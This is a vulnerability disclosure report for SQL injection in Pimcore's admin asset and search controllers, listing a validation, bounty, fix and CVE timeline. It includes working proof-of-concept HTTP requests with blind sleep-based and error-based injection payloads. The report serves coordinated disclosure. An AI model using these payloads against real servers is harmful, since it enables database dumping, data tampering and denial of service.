sql injection in pimcore/pimcore


Reported on

Mar 23rd 2023


multiple sql injections due to unsanitized concatenating strings into where clause

Collaborator: @ub3rsick

Proof of Concept - assets controller

1- to trigger the request for sqli: go to files -> assets -> select a folder -> right click -> download as zip 2- replay the request to /admin/asset/download-as-zip-add-files and injection point is parameter selectedIds

exploitation is blind and you can induce a sleep with request like the following:

GET /admin/asset/download-as-zip-add-files?_dc=1679556461362&id=287&selectedIds=1,4,1+and+sleep(4)+or+1,2&offset=10&limit=5&jobId=641bfd26c1d25 HTTP/1.1

Proof of Concept - translations controller


Proof of Concept - search controller

GET /admin/search/search/find?_dc=1679542590358&type=document&query=e&subtype=page&context=%7B%22scope%22%3A%22globalSearch%22%7D&page=1&start=0&limit=50&class=CustomerSegmentGroup&property=key&filter=[{"property":"key"}]&fields[]=Bodywork_CAR+`o_id`on+`fieldname`))+or+extractvalue(rand(),concat(0x3a,version()))--+---+-~


dump database, alter data or perform dos on the backend dbms

We are processing your report and will contact the pimcore team within 24 hours. 8 months ago
We have contacted a member of the pimcore team and are waiting to hear back 8 months ago
rekter0 modified the report
8 months ago
rekter0 modified the report
8 months ago
Bernhard Rusch validated this vulnerability 7 months ago
rekter0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Divesh Pahuja marked this as fixed in 10.5.21 with commit 21e35a 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Divesh Pahuja published this vulnerability 7 months ago
to join this conversation